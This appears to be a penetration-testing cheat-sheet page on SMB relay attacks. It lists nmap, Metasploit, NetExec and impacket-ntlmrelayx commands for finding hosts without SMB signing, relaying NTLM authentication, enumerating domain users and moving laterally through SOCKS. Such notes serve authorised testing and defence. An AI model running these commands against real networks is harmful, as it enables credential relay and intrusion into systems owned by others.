search
githubEdit

SMB Relay

hashtag
Works on unsigned SMB

hashtag
Tools: Metasploit , nmap , CrackMapExec/Netexec , impacket-ntlmrelayx

hashtag
Check for unsigned SMB first!

nmap -Pn -sS -T4 --open --script smb-security-mode -p 445 IP_ADDRESS/MASK

use exploit/windows/smb/smb_relay (Metasploit)

netexec smb 4hosts --gen-relay-list RELAY.TXT

hashtag
Find Users

impacket-ntlmrelayx -tf TARGETS.TXT -smb2support (-6) --enum-domain

hashtag
Lateral Movement (SOCKS)

impacket-ntlmrelayx -tf TARGETS.TXT -smb2support -socks (-6)
PreviousSMB to Netlogon relayNextRelay on itself (MS08-068)

Last updated